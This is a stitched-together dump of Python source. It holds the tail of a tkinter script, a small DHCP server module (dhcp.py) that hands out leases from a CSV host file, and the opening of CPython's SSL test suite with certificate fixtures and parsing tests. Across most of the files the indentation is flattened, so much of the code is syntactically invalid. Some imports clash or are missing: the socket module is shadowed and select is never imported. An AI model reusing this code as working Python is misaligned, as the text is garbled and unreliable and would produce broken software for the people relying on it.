fr.protocol("WM_DELETE_WINDOW",lambda *a:fr.master.quit())
fr.master.withdraw()
fr.mainloop()
dhcp.py
#!/usr/bin/python3
import time
import threading
import struct
import queue
import collections
import traceback
import random
import socket
from listener import *
def get_host_ip_addresses():
    return socket.gethostbyname_ex(socket.gethostname())[2]
class WriteBootProtocolPacket(object):
    message_type = 2  # BOOTP op field: 1 = client -> server (BOOTREQUEST), 2 = server -> client (BOOTREPLY)
hardware_type = 1
hardware_address_length = 6
hops = 0
transaction_id = None
seconds_elapsed = 0
bootp_flags = 0 # unicast
client_ip_address = '0.0.0.0'
your_ip_address = '0.0.0.0'
next_server_ip_address = '0.0.0.0'
relay_agent_ip_address = '0.0.0.0'
client_mac_address = None
magic_cookie = '99.130.83.99'
parameter_order = []
def __init__(self, configuration):
for i in range(256):
names = ['option_{}'.format(i)]
if i < len(options) and hasattr(configuration, options[i][0]):
names.append(options[i][0])
for name in names:
if hasattr(configuration, name):
setattr(self, name, getattr(configuration, name))
def to_bytes(self):
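        # Fixed-size BOOTP header (236 bytes, RFC 2131), followed by the magic cookie and DHCP options.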
result = bytearray(236)
result[0] = self.message_type
result[1] = self.hardware_type
result[2] = self.hardware_address_length
result[3] = self.hops
result[4:8] = struct.pack('>I', self.transaction_id)
result[ 8:10] = shortpack(self.seconds_elapsed)
result[10:12] = shortpack(self.bootp_flags)
result[12:16] = inet_aton(self.client_ip_address)
result[16:20] = inet_aton(self.your_ip_address)
result[20:24] = inet_aton(self.next_server_ip_address)
result[24:28] = inet_aton(self.relay_agent_ip_address)
result[28:28 + self.hardware_address_length] = macpack(self.client_mac_address)
result += inet_aton(self.magic_cookie)
for option in self.options:
value = self.get_option(option)
#print(option, value)
if value is None:
continue
result += bytes([option, len(value)]) + value
result += bytes([255])
return bytes(result)
def get_option(self, option):
if option < len(options) and hasattr(self, options[option][0]):
value = getattr(self, options[option][0])
elif hasattr(self, 'option_{}'.format(option)):
value = getattr(self, 'option_{}'.format(option))
else:
return None
function = options[option][2]
if function and value is not None:
value = function(value)
return value
@property
def options(self):
done = list()
# fulfill wishes
for option in self.parameter_order:
if option < len(options) and hasattr(self, options[option][0]) or hasattr(self, 'option_{}'.format(option)):
                # this may deviate from the specification, but we try to honour the client's requested order first
if option not in done:
done.append(option)
# add my stuff
for option, o in enumerate(options):
if o[0] and hasattr(self, o[0]):
if option not in done:
done.append(option)
for option in range(256):
if hasattr(self, 'option_{}'.format(option)):
if option not in done:
done.append(option)
return done
def __str__(self):
return str(ReadBootProtocolPacket(self.to_bytes()))
class DelayWorker(object):
def __init__(self):
self.closed = False
self.queue = queue.PriorityQueue()
self.thread = threading.Thread(target = self._delay_response_thread)
self.thread.start()
    def _delay_response_thread(self):
        while not self.closed:
            if not self.queue.empty():
                p = self.queue.get()
                t, func, args, kw = p
                now = time.time()
                if now < t:
                    # not due yet: wait briefly and put it back
                    time.sleep(0.01)
                    self.queue.put(p)
                else:
                    func(*args, **kw)
            else:
                # nothing queued; sleep briefly instead of busy-waiting
                time.sleep(0.01)
def do_after(self, seconds, func, args = (), kw = {}):
self.queue.put((time.time() + seconds, func, args, kw))
def close(self):
self.closed = True
class Transaction(object):
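    # Tracks one client's DHCP exchange (DISCOVER/OFFER, REQUEST/ACK, or INFORM) until it times out.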
def __init__(self, server):
self.server = server
self.configuration = server.configuration
self.packets = []
self.done_time = time.time() + self.configuration.length_of_transaction
self.done = False
self.do_after = self.server.delay_worker.do_after
def is_done(self):
return self.done or self.done_time < time.time()
def close(self):
self.done = True
def receive(self, packet):
# packet from client <-> packet.message_type == 1
if packet.message_type == 1 and packet.dhcp_message_type == 'DHCPDISCOVER':
self.do_after(self.configuration.dhcp_offer_after_seconds,
self.received_dhcp_discover, (packet,), )
elif packet.message_type == 1 and packet.dhcp_message_type == 'DHCPREQUEST':
self.do_after(self.configuration.dhcp_acknowledge_after_seconds,
self.received_dhcp_request, (packet,), )
elif packet.message_type == 1 and packet.dhcp_message_type == 'DHCPINFORM':
self.received_dhcp_inform(packet)
else:
return False
return True
def received_dhcp_discover(self, discovery):
if self.is_done(): return
self.configuration.debug('discover:\n {}'.format(str(discovery).replace('\n', '\n\t')))
self.send_offer(discovery)
def send_offer(self, discovery):
# https://tools.ietf.org/html/rfc2131
offer = WriteBootProtocolPacket(self.configuration)
offer.parameter_order = discovery.parameter_request_list
mac = discovery.client_mac_address
ip = offer.your_ip_address = self.server.get_ip_address(discovery)
# offer.client_ip_address =
offer.transaction_id = discovery.transaction_id
# offer.next_server_ip_address =
offer.relay_agent_ip_address = discovery.relay_agent_ip_address
offer.client_mac_address = mac
offer.client_ip_address = discovery.client_ip_address or '0.0.0.0'
offer.bootp_flags = discovery.bootp_flags
offer.dhcp_message_type = 'DHCPOFFER'
offer.client_identifier = mac
self.server.broadcast(offer)
def received_dhcp_request(self, request):
if self.is_done(): return
self.server.client_has_chosen(request)
self.acknowledge(request)
self.close()
def acknowledge(self, request):
ack = WriteBootProtocolPacket(self.configuration)
ack.parameter_order = request.parameter_request_list
ack.transaction_id = request.transaction_id
# ack.next_server_ip_address =
ack.bootp_flags = request.bootp_flags
ack.relay_agent_ip_address = request.relay_agent_ip_address
mac = request.client_mac_address
ack.client_mac_address = mac
requested_ip_address = request.requested_ip_address
ack.client_ip_address = request.client_ip_address or '0.0.0.0'
ack.your_ip_address = self.server.get_ip_address(request)
ack.dhcp_message_type = 'DHCPACK'
self.server.broadcast(ack)
def received_dhcp_inform(self, inform):
self.close()
self.server.client_has_chosen(inform)
class DHCPServerConfiguration(object):
dhcp_offer_after_seconds = 10
dhcp_acknowledge_after_seconds = 10
length_of_transaction = 40
network = '192.168.173.0'
broadcast_address = '255.255.255.255'
subnet_mask = '255.255.255.0'
router = None # list of ips
# 1 day is 86400
ip_address_lease_time = 300 # seconds
domain_name_server = None # list of ips
host_file = 'hosts.csv'
debug = lambda *args, **kw: None
def load(self, file):
with open(file) as f:
exec(f.read(), self.__dict__)
def adjust_if_this_computer_is_a_router(self):
ip_addresses = get_host_ip_addresses()
for ip in reversed(ip_addresses):
if ip.split('.')[-1] == '1':
self.router = [ip]
self.domain_name_server = [ip]
self.network = '.'.join(ip.split('.')[:-1] + ['0'])
self.broadcast_address = '.'.join(ip.split('.')[:-1] + ['255'])
#self.ip_forwarding_enabled = True
#self.non_local_source_routing_enabled = True
#self.perform_mask_discovery = True
def all_ip_addresses(self):
ips = ip_addresses(self.network, self.subnet_mask)
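        # skip the first five host addresses (e.g. router/static hosts) before handing out leases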
for i in range(5):
next(ips)
return ips
def network_filter(self):
return NETWORK(self.network, self.subnet_mask)
def ip_addresses(network, subnet_mask):
import socket, struct
subnet_mask = struct.unpack('>I', socket.inet_aton(subnet_mask))[0]
network = struct.unpack('>I', socket.inet_aton(network))[0]
network = network & subnet_mask
start = network + 1
end = (network | (~subnet_mask & 0xffffffff))
return (socket.inet_ntoa(struct.pack('>I', i)) for i in range(start, end))
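# For example, ip_addresses('192.168.173.0', '255.255.255.0') yields
# '192.168.173.1' through '192.168.173.254'; the network and broadcast
# addresses fall outside the start/end bounds above.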
class ALL(object):
def __eq__(self, other):
return True
def __repr__(self):
return self.__class__.__name__
ALL = ALL()
class GREATER(object):
def __init__(self, value):
self.value = value
def __eq__(self, other):
return type(self.value)(other) > self.value
class NETWORK(object):
def __init__(self, network, subnet_mask):
self.subnet_mask = struct.unpack('>I', inet_aton(subnet_mask))[0]
self.network = struct.unpack('>I', inet_aton(network))[0]
def __eq__(self, other):
ip = struct.unpack('>I', inet_aton(other))[0]
return ip & self.subnet_mask == self.network and \
ip - self.network and \
ip - self.network != ~self.subnet_mask & 0xffffffff
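# For example, '192.168.173.42' == NETWORK('192.168.173.0', '255.255.255.0')
# is True, while the network address ('192.168.173.0') and the broadcast
# address ('192.168.173.255') both compare as False.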
class CASEINSENSITIVE(object):
def __init__(self, s):
self.s = s.lower()
def __eq__(self, other):
return self.s == other.lower()
class CSVDatabase(object):
delimiter = ';'
def __init__(self, file_name):
self.file_name = file_name
self.file('a').close() # create file
def file(self, mode = 'r'):
return open(self.file_name, mode)
def get(self, pattern):
pattern = list(pattern)
return [line for line in self.all() if pattern == line]
def add(self, line):
with self.file('a') as f:
f.write(self.delimiter.join(line) + '\n')
def delete(self, pattern):
lines = self.all()
lines_to_delete = self.get(pattern)
self.file('w').close() # empty file
for line in lines:
if line not in lines_to_delete:
self.add(line)
def all(self):
with self.file() as f:
return [list(line.strip().split(self.delimiter)) for line in f]
class Host(object):
def __init__(self, mac, ip, hostname, last_used):
self.mac = mac.upper()
self.ip = ip
self.hostname = hostname
self.last_used = int(last_used)
@classmethod
def from_tuple(cls, line):
mac, ip, hostname, last_used = line
last_used = int(last_used)
return cls(mac, ip, hostname, last_used)
@classmethod
def from_packet(cls, packet):
return cls(packet.client_mac_address,
packet.requested_ip_address or packet.client_ip_address,
packet.host_name or '',
int(time.time()))
@staticmethod
def get_pattern(mac = ALL, ip = ALL, hostname = ALL, last_used = ALL):
return [mac, ip, hostname, last_used]
def to_tuple(self):
return [self.mac, self.ip, self.hostname, str(int(self.last_used))]
def to_pattern(self):
return self.get_pattern(ip = self.ip, mac = self.mac)
    def __hash__(self):
        # consistent with __eq__, which compares to_tuple()
        return hash(tuple(self.to_tuple()))
def __eq__(self, other):
return self.to_tuple() == other.to_tuple()
def has_valid_ip(self):
return self.ip and self.ip != '0.0.0.0'
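# Hosts are persisted as one CSV row per entry using CSVDatabase's ';' delimiter,
# e.g. (hypothetical values):
#
#     AA:BB:CC:DD:EE:FF;192.168.173.10;laptop;1546300800
#
# from_tuple()/to_tuple() convert between that row format and Host objects.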
class HostDatabase(object):
def __init__(self, file_name):
self.db = CSVDatabase(file_name)
def get(self, **kw):
pattern = Host.get_pattern(**kw)
return list(map(Host.from_tuple, self.db.get(pattern)))
def add(self, host):
self.db.add(host.to_tuple())
def delete(self, host = None, **kw):
if host is None:
pattern = Host.get_pattern(**kw)
else:
pattern = host.to_pattern()
self.db.delete(pattern)
def all(self):
return list(map(Host.from_tuple, self.db.all()))
def replace(self, host):
self.delete(host)
self.add(host)
def sorted_hosts(hosts):
hosts = list(hosts)
hosts.sort(key = lambda host: (host.hostname.lower(), host.mac.lower(), host.ip.lower()))
return hosts
class DHCPServer(object):
def __init__(self, configuration = None):
        if configuration is None:
configuration = DHCPServerConfiguration()
self.configuration = configuration
self.socket = socket(type = SOCK_DGRAM)
self.socket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
self.socket.bind(('', 67))
self.delay_worker = DelayWorker()
self.closed = False
self.transactions = collections.defaultdict(lambda: Transaction(self)) # id: transaction
self.hosts = HostDatabase(self.configuration.host_file)
self.time_started = time.time()
def close(self):
self.socket.close()
self.closed = True
self.delay_worker.close()
for transaction in list(self.transactions.values()):
transaction.close()
def update(self, timeout = 0):
try:
reads = select.select([self.socket], [], [], timeout)[0]
except ValueError:
# ValueError: file descriptor cannot be a negative integer (-1)
return
        for sock in reads:
            try:
                packet = ReadBootProtocolPacket(*sock.recvfrom(4096))
            except OSError:
                # OSError: [WinError 10038] An operation was attempted on something that is not a socket
                pass
            else:
                self.received(packet)
for transaction_id, transaction in list(self.transactions.items()):
if transaction.is_done():
transaction.close()
self.transactions.pop(transaction_id)
def received(self, packet):
if not self.transactions[packet.transaction_id].receive(packet):
self.configuration.debug('received:\n {}'.format(str(packet).replace('\n', '\n\t')))
def client_has_chosen(self, packet):
self.configuration.debug('client_has_chosen:\n {}'.format(str(packet).replace('\n', '\n\t')))
host = Host.from_packet(packet)
if not host.has_valid_ip():
return
self.hosts.replace(host)
def is_valid_client_address(self, address):
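        # per-octet comparison: assumes every subnet mask octet is either 0 or 255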
if address is None:
return False
a = address.split('.')
s = self.configuration.subnet_mask.split('.')
n = self.configuration.network.split('.')
return all(s[i] == '0' or a[i] == n[i] for i in range(4))
def get_ip_address(self, packet):
mac_address = packet.client_mac_address
requested_ip_address = packet.requested_ip_address
known_hosts = self.hosts.get(mac = CASEINSENSITIVE(mac_address))
ip = None
if known_hosts:
# 1. choose known ip address
for host in known_hosts:
if self.is_valid_client_address(host.ip):
ip = host.ip
print('known ip:', ip)
if ip is None and self.is_valid_client_address(requested_ip_address):
# 2. choose valid requested ip address
ip = requested_ip_address
print('valid ip:', ip)
if ip is None:
# 3. choose new, free ip address
chosen = False
network_hosts = self.hosts.get(ip = self.configuration.network_filter())
for ip in self.configuration.all_ip_addresses():
if not any(host.ip == ip for host in network_hosts):
chosen = True
break
if not chosen:
# 4. reuse old valid ip address
network_hosts.sort(key = lambda host: host.last_used)
ip = network_hosts[0].ip
assert self.is_valid_client_address(ip)
print('new ip:', ip)
if not any([host.ip == ip for host in known_hosts]):
print('add', mac_address, ip, packet.host_name)
self.hosts.replace(Host(mac_address, ip, packet.host_name or '', time.time()))
return ip
@property
def server_identifiers(self):
return get_host_ip_addresses()
def broadcast(self, packet):
self.configuration.debug('broadcasting:\n {}'.format(str(packet).replace('\n', '\n\t')))
for addr in self.server_identifiers:
broadcast_socket = socket(type = SOCK_DGRAM)
broadcast_socket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
broadcast_socket.setsockopt(SOL_SOCKET, SO_BROADCAST, 1)
packet.server_identifier = addr
broadcast_socket.bind((addr, 67))
try:
data = packet.to_bytes()
broadcast_socket.sendto(data, ('255.255.255.255', 68))
broadcast_socket.sendto(data, (addr, 68))
finally:
broadcast_socket.close()
def run(self):
while not self.closed:
try:
self.update(1)
except KeyboardInterrupt:
break
except:
traceback.print_exc()
def run_in_thread(self):
thread = threading.Thread(target = self.run)
thread.start()
return thread
    def debug_clients(self):
        # the raw CSV rows (lists of strings) live in self.hosts.db
        for line in self.hosts.db.all():
            line = '\t'.join(line)
            if line:
                self.configuration.debug(line)
def get_all_hosts(self):
return sorted_hosts(self.hosts.get())
def get_current_hosts(self):
return sorted_hosts(self.hosts.get(last_used = GREATER(self.time_started)))
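# Running this module directly starts the server on UDP port 67, which on most
# systems requires administrator/root privileges.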
if __name__ == '__main__':
configuration = DHCPServerConfiguration()
configuration.debug = print
configuration.adjust_if_this_computer_is_a_router()
    # configuration.router += ['192.168.0.1']  # optionally append additional routers
configuration.ip_address_lease_time = 60
server = DHCPServer(configuration)
for ip in server.configuration.all_ip_addresses():
assert ip == server.configuration.network_filter()
server.run()
|
test_ssl.py
|
# Test the support for SSL and sockets
import sys
import unittest
from test import support
import socket
import select
import time
import datetime
import gc
import os
import errno
import pprint
import urllib.request
import threading
import traceback
import asyncore
import weakref
import platform
import functools
import sysconfig
try:
import ctypes
except ImportError:
ctypes = None
ssl = support.import_module("ssl")
PROTOCOLS = sorted(ssl._PROTOCOL_NAMES)
HOST = support.HOST
IS_LIBRESSL = ssl.OPENSSL_VERSION.startswith('LibreSSL')
IS_OPENSSL_1_1_0 = not IS_LIBRESSL and ssl.OPENSSL_VERSION_INFO >= (1, 1, 0)
IS_OPENSSL_1_1_1 = not IS_LIBRESSL and ssl.OPENSSL_VERSION_INFO >= (1, 1, 1)
PY_SSL_DEFAULT_CIPHERS = sysconfig.get_config_var('PY_SSL_DEFAULT_CIPHERS')
def data_file(*name):
return os.path.join(os.path.dirname(__file__), *name)
# The custom key and certificate files used in test_ssl are generated
# using Lib/test/make_ssl_certs.py.
# Other certificates are simply fetched from the Internet servers they
# are meant to authenticate.
CERTFILE = data_file("keycert.pem")
BYTES_CERTFILE = os.fsencode(CERTFILE)
ONLYCERT = data_file("ssl_cert.pem")
ONLYKEY = data_file("ssl_key.pem")
BYTES_ONLYCERT = os.fsencode(ONLYCERT)
BYTES_ONLYKEY = os.fsencode(ONLYKEY)
CERTFILE_PROTECTED = data_file("keycert.passwd.pem")
ONLYKEY_PROTECTED = data_file("ssl_key.passwd.pem")
KEY_PASSWORD = "somepass"
CAPATH = data_file("capath")
BYTES_CAPATH = os.fsencode(CAPATH)
CAFILE_NEURONIO = data_file("capath", "4e1295a3.0")
CAFILE_CACERT = data_file("capath", "5ed36f99.0")
CERTFILE_INFO = {
'issuer': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'notAfter': 'Aug 26 14:23:15 2028 GMT',
'notBefore': 'Aug 29 14:23:15 2018 GMT',
'serialNumber': '98A7CF88C74A32ED',
'subject': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'subjectAltName': (('DNS', 'localhost'),),
'version': 3
}
# empty CRL
CRLFILE = data_file("revocation.crl")
# Two keys and certs signed by the same CA (for SNI tests)
SIGNED_CERTFILE = data_file("keycert3.pem")
SIGNED_CERTFILE_HOSTNAME = 'localhost'
SIGNED_CERTFILE_INFO = {
'OCSP': ('http://testca.pythontest.net/testca/ocsp/',),
'caIssuers': ('http://testca.pythontest.net/testca/pycacert.cer',),
'crlDistributionPoints': ('http://testca.pythontest.net/testca/revocation.crl',),
'issuer': ((('countryName', 'XY'),),
(('organizationName', 'Python Software Foundation CA'),),
(('commonName', 'our-ca-server'),)),
'notAfter': 'Jul 7 14:23:16 2028 GMT',
'notBefore': 'Aug 29 14:23:16 2018 GMT',
'serialNumber': 'CB2D80995A69525C',
'subject': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'subjectAltName': (('DNS', 'localhost'),),
'version': 3
}
SIGNED_CERTFILE2 = data_file("keycert4.pem")
SIGNED_CERTFILE2_HOSTNAME = 'fakehostname'
SIGNED_CERTFILE_ECC = data_file("keycertecc.pem")
SIGNED_CERTFILE_ECC_HOSTNAME = 'localhost-ecc'
# Same certificate as pycacert.pem, but without extra text in file
SIGNING_CA = data_file("capath", "ceff1710.0")
# cert with all kinds of subject alt names
ALLSANFILE = data_file("allsans.pem")
IDNSANSFILE = data_file("idnsans.pem")
REMOTE_HOST = "self-signed.pythontest.net"
EMPTYCERT = data_file("nullcert.pem")
BADCERT = data_file("badcert.pem")
NONEXISTINGCERT = data_file("XXXnonexisting.pem")
BADKEY = data_file("badkey.pem")
NOKIACERT = data_file("nokia.pem")
NULLBYTECERT = data_file("nullbytecert.pem")
DHFILE = data_file("ffdh3072.pem")
BYTES_DHFILE = os.fsencode(DHFILE)
# Not defined in all versions of OpenSSL
OP_NO_COMPRESSION = getattr(ssl, "OP_NO_COMPRESSION", 0)
OP_SINGLE_DH_USE = getattr(ssl, "OP_SINGLE_DH_USE", 0)
OP_SINGLE_ECDH_USE = getattr(ssl, "OP_SINGLE_ECDH_USE", 0)
OP_CIPHER_SERVER_PREFERENCE = getattr(ssl, "OP_CIPHER_SERVER_PREFERENCE", 0)
OP_ENABLE_MIDDLEBOX_COMPAT = getattr(ssl, "OP_ENABLE_MIDDLEBOX_COMPAT", 0)
def handle_error(prefix):
exc_format = ' '.join(traceback.format_exception(*sys.exc_info()))
if support.verbose:
sys.stdout.write(prefix + exc_format)
def can_clear_options():
# 0.9.8m or higher
return ssl._OPENSSL_API_VERSION >= (0, 9, 8, 13, 15)
def no_sslv2_implies_sslv3_hello():
# 0.9.7h or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 7, 8, 15)
def have_verify_flags():
# 0.9.8 or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 8, 0, 15)
def _have_secp_curves():
if not ssl.HAS_ECDH:
return False
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
try:
ctx.set_ecdh_curve("secp384r1")
except ValueError:
return False
else:
return True
HAVE_SECP_CURVES = _have_secp_curves()
def utc_offset(): #NOTE: ignore issues like #1647654
# local time = utc time + utc offset
if time.daylight and time.localtime().tm_isdst > 0:
return -time.altzone # seconds
return -time.timezone
def asn1time(cert_time):
# Some versions of OpenSSL ignore seconds, see #18207
# 0.9.8.i
if ssl._OPENSSL_API_VERSION == (0, 9, 8, 9, 15):
fmt = "%b %d %H:%M:%S %Y GMT"
dt = datetime.datetime.strptime(cert_time, fmt)
dt = dt.replace(second=0)
cert_time = dt.strftime(fmt)
# %d adds leading zero but ASN1_TIME_print() uses leading space
if cert_time[4] == "0":
cert_time = cert_time[:4] + " " + cert_time[5:]
return cert_time
# Issue #9415: Ubuntu hijacks their OpenSSL and forcefully disables SSLv2
def skip_if_broken_ubuntu_ssl(func):
if hasattr(ssl, 'PROTOCOL_SSLv2'):
@functools.wraps(func)
def f(*args, **kwargs):
try:
ssl.SSLContext(ssl.PROTOCOL_SSLv2)
except ssl.SSLError:
if (ssl.OPENSSL_VERSION_INFO == (0, 9, 8, 15, 15) and
platform.linux_distribution() == ('debian', 'squeeze/sid', '')):
raise unittest.SkipTest("Patched Ubuntu OpenSSL breaks behaviour")
return func(*args, **kwargs)
return f
else:
return func
needs_sni = unittest.skipUnless(ssl.HAS_SNI, "SNI support needed for this test")
def test_wrap_socket(sock, ssl_version=ssl.PROTOCOL_TLS, *,
cert_reqs=ssl.CERT_NONE, ca_certs=None,
ciphers=None, certfile=None, keyfile=None,
**kwargs):
context = ssl.SSLContext(ssl_version)
if cert_reqs is not None:
if cert_reqs == ssl.CERT_NONE:
context.check_hostname = False
context.verify_mode = cert_reqs
if ca_certs is not None:
context.load_verify_locations(ca_certs)
if certfile is not None or keyfile is not None:
context.load_cert_chain(certfile, keyfile)
if ciphers is not None:
context.set_ciphers(ciphers)
return context.wrap_socket(sock, **kwargs)
def testing_context(server_cert=SIGNED_CERTFILE):
"""Create context
client_context, server_context, hostname = testing_context()
"""
if server_cert == SIGNED_CERTFILE:
hostname = SIGNED_CERTFILE_HOSTNAME
elif server_cert == SIGNED_CERTFILE2:
hostname = SIGNED_CERTFILE2_HOSTNAME
else:
raise ValueError(server_cert)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(server_cert)
server_context.load_verify_locations(SIGNING_CA)
return client_context, server_context, hostname
class BasicSocketTests(unittest.TestCase):
def test_constants(self):
ssl.CERT_NONE
ssl.CERT_OPTIONAL
ssl.CERT_REQUIRED
ssl.OP_CIPHER_SERVER_PREFERENCE
ssl.OP_SINGLE_DH_USE
if ssl.HAS_ECDH:
ssl.OP_SINGLE_ECDH_USE
if ssl.OPENSSL_VERSION_INFO >= (1, 0):
ssl.OP_NO_COMPRESSION
self.assertIn(ssl.HAS_SNI, {True, False})
self.assertIn(ssl.HAS_ECDH, {True, False})
ssl.OP_NO_SSLv2
ssl.OP_NO_SSLv3
ssl.OP_NO_TLSv1
ssl.OP_NO_TLSv1_3
if ssl.OPENSSL_VERSION_INFO >= (1, 0, 1):
ssl.OP_NO_TLSv1_1
ssl.OP_NO_TLSv1_2
self.assertEqual(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv23)
def test_private_init(self):
with self.assertRaisesRegex(TypeError, "public constructor"):
with socket.socket() as s:
ssl.SSLSocket(s)
def test_str_for_enums(self):
# Make sure that the PROTOCOL_* constants have enum-like string
# reprs.
proto = ssl.PROTOCOL_TLS
self.assertEqual(str(proto), '_SSLMethod.PROTOCOL_TLS')
ctx = ssl.SSLContext(proto)
self.assertIs(ctx.protocol, proto)
def test_random(self):
v = ssl.RAND_status()
if support.verbose:
sys.stdout.write("\n RAND_status is %d (%s)\n"
% (v, (v and "sufficient randomness") or
"insufficient randomness"))
data, is_cryptographic = ssl.RAND_pseudo_bytes(16)
self.assertEqual(len(data), 16)
self.assertEqual(is_cryptographic, v == 1)
if v:
data = ssl.RAND_bytes(16)
self.assertEqual(len(data), 16)
else:
self.assertRaises(ssl.SSLError, ssl.RAND_bytes, 16)
# negative num is invalid
self.assertRaises(ValueError, ssl.RAND_bytes, -5)
self.assertRaises(ValueError, ssl.RAND_pseudo_bytes, -5)
if hasattr(ssl, 'RAND_egd'):
self.assertRaises(TypeError, ssl.RAND_egd, 1)
self.assertRaises(TypeError, ssl.RAND_egd, 'foo', 1)
ssl.RAND_add("this is a random string", 75.0)
ssl.RAND_add(b"this is a random bytes object", 75.0)
ssl.RAND_add(bytearray(b"this is a random bytearray object"), 75.0)
@unittest.skipUnless(os.name == 'posix', 'requires posix')
def test_random_fork(self):
status = ssl.RAND_status()
if not status:
self.fail("OpenSSL's PRNG has insufficient randomness")
rfd, wfd = os.pipe()
pid = os.fork()
if pid == 0:
try:
os.close(rfd)
child_random = ssl.RAND_pseudo_bytes(16)[0]
self.assertEqual(len(child_random), 16)
os.write(wfd, child_random)
os.close(wfd)
except BaseException:
os._exit(1)
else:
os._exit(0)
else:
os.close(wfd)
self.addCleanup(os.close, rfd)
_, status = os.waitpid(pid, 0)
self.assertEqual(status, 0)
child_random = os.read(rfd, 16)
self.assertEqual(len(child_random), 16)
parent_random = ssl.RAND_pseudo_bytes(16)[0]
self.assertEqual(len(parent_random), 16)
self.assertNotEqual(child_random, parent_random)
maxDiff = None
def test_parse_cert(self):
# note that this uses an 'unofficial' function in _ssl.c,
# provided solely for this test, to exercise the certificate
# parsing code
self.assertEqual(
ssl._ssl._test_decode_cert(CERTFILE),
CERTFILE_INFO
)
self.assertEqual(
ssl._ssl._test_decode_cert(SIGNED_CERTFILE),
SIGNED_CERTFILE_INFO
)
# Issue #13034: the subjectAltName in some certificates
# (notably projects.developer.nokia.com:443) wasn't parsed
p = ssl._ssl._test_decode_cert(NOKIACERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['subjectAltName'],
(('DNS', 'projects.developer.nokia.com'),
('DNS', 'projects.forum.nokia.com'))
)
# extra OCSP and AIA fields
self.assertEqual(p['OCSP'], ('http://ocsp.verisign.com',))
self.assertEqual(p['caIssuers'],
('http://SVRIntl-G3-aia.verisign.com/SVRIntlG3.cer',))
self.assertEqual(p['crlDistributionPoints'],
('http://SVRIntl-G3-crl.verisign.com/SVRIntlG3.crl',))
def test_parse_cert_CVE_2013_4238(self):
p = ssl._ssl._test_decode_cert(NULLBYTECERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
subject = ((('countryName', 'US'),),
(('stateOrProvinceName', 'Oregon'),),
(('localityName', 'Beaverton'),),
(('organizationName', 'Python Software Foundation'),),
(('organizationalUnitName', 'Python Core Development'),),
(('commonName', 'null.python.org\x00example.org'),),
(('emailAddress', 'python-dev@python.org'),))
self.assertEqual(p['subject'], subject)
self.assertEqual(p['issuer'], subject)
if ssl._OPENSSL_API_VERSION >= (0, 9, 8):
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '2001:DB8:0:0:0:0:0:1\n'))
else:
# OpenSSL 0.9.7 doesn't support IPv6 addresses in subjectAltName
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '<invalid>'))
self.assertEqual(p['subjectAltName'], san)
def test_parse_all_sans(self):
p = ssl._ssl._test_decode_cert(ALLSANFILE)
self.assertEqual(p['subjectAltName'],
(
('DNS', 'allsans'),
('othername', '<unsupported>'),
('othername', '<unsupported>'),
('email', 'user@example.org'),
('DNS', 'www.example.org'),
('DirName',
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'dirname example'),))),
('URI', 'https://www.python.org/'),
('IP Address', '127.0.0.1'),
('IP Address', '0:0:0:0:0:0:0:1\n'),
('Registered ID', '1.2.3.4.5')
)
)
def test_DER_to_PEM(self):
with open(CAFILE_CACERT, 'r') as f:
pem = f.read()
d1 = ssl.PEM_cert_to_DER_cert(pem)
p2 = ssl.DER_cert_to_PEM_cert(d1)
d2 = ssl.PEM_cert_to_DER_cert(p2)
self.assertEqual(d1, d2)
if not p2.startswith(ssl.PEM_HEADER + '\n'):
self.fail("DER-to-PEM didn't include correct header:\n%r\n" % p2)
if not p2.endswith('\n' + ssl.PEM_FOOTER + '\n'):
self.fail("DER-to-PEM didn't include correct footer:\n%r\n" % p2)
def test_openssl_version(self):
n = ssl.OPENSSL_VERSION_NUMBER
t = ssl.OPENSSL_VERSION_INFO
s = ssl.OPENSSL_VERSION
self.assertIsInstance(n, int)
self.assertIsInstance(t, tuple)
self.assertIsInstance(s, str)
# Some sanity checks follow
# >= 0.9
self.assertGreaterEqual(n, 0x900000)
# < 3.0
self.assertLess(n, 0x30000000)
major, minor, fix, patch, status = t
self.assertGreaterEqual(major, 0)
self.assertLess(major, 3)
self.assertGreaterEqual(minor, 0)
self.assertLess(minor, 256)
self.assertGreaterEqual(fix, 0)
self.assertLess(fix, 256)
self.assertGreaterEqual(patch, 0)
self.assertLessEqual(patch, 63)
self.assertGreaterEqual(status, 0)
self.assertLessEqual(status, 15)
# Version string as returned by {Open,Libre}SSL, the format might change
if IS_LIBRESSL:
self.assertTrue(s.startswith("LibreSSL {:d}".format(major)),
(s, t, hex(n)))
else:
self.assertTrue(s.startswith("OpenSSL {:d}.{:d}.{:d}".format(major, minor, fix)),
(s, t, hex(n)))
@support.cpython_only
def test_refcycle(self):
# Issue #7943: an SSL object doesn't create reference cycles with
# itself.
s = socket.socket(socket.AF_INET)
ss = test_wrap_socket(s)
wr = weakref.ref(ss)
with support.check_warnings(("", ResourceWarning)):
del ss
self.assertEqual(wr(), None)
def test_wrapped_unconnected(self):
        # Methods on an unconnected SSLSocket propagate the original
        # OSError raised by the underlying socket object.
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertRaises(OSError, ss.recv, 1)
